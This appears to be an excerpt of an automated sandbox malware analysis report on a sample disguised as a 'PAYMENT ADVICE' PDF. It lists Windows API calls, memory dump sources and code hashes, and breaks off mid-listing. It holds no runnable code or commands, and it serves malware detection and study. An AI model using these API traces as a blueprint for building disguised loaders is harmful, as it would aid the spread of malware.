                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                    • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                    • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                                    • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                    • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                                                    • GetLastError.KERNEL32 ref: 00405714
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                    • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                    • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                                                    • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                    • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                                                    • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2036183059.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2036170525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036195897.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036208769.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocErrorLastVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 497505419-0
                                                                                                                                    • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                    • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                                    • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                                    • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                                      • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointerwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 327478801-0
                                                                                                                                    • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                                    • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                                                    • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                                    • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                                                    APIs
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 390214022-0
                                                                                                                                    • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                    • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                                    • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                                    • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,0000046E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Open
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                    • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                                    • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                                                    • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                                    • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                                                    APIs
                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                    • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                    • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                                                    • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                    • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                    • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                                                    • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                    • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                                                    APIs
                                                                                                                                    • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2036183059.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2036170525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036195897.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036208769.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                    • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                                    • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                    • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                                    APIs
                                                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                                    • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                                                    • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                                    • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                                    • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                                                    • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                                    • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                    • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                    • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                                    • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                    • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                      • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                    • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                    • CloseClipboard.USER32 ref: 00405676
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                    • String ID: {
                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                    • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                                    • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                                    • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                                    • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                    • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                      • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
